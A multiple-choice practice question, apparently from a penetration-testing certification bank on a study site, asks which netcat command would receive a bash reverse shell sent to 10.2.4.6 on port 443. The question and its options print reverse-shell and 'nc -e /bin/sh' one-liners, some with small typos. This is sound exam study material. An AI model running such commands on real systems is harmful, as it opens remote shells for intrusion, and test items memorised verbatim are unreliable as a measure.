Solved

A Tester Intends to Run the Following Command on a Target

Question 46

Multiple Choice

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?


A) nc -nlvp 443
B) nc 10.2.4.6. 443
C) nc -w3 10.2.4.6 443
D) nc -e /bin/sh 10.2.4.6. 443

Correct Answer:

verifed

Verified

Unlock this answer now
Get Access to more Verified Answers free of charge

Related Questions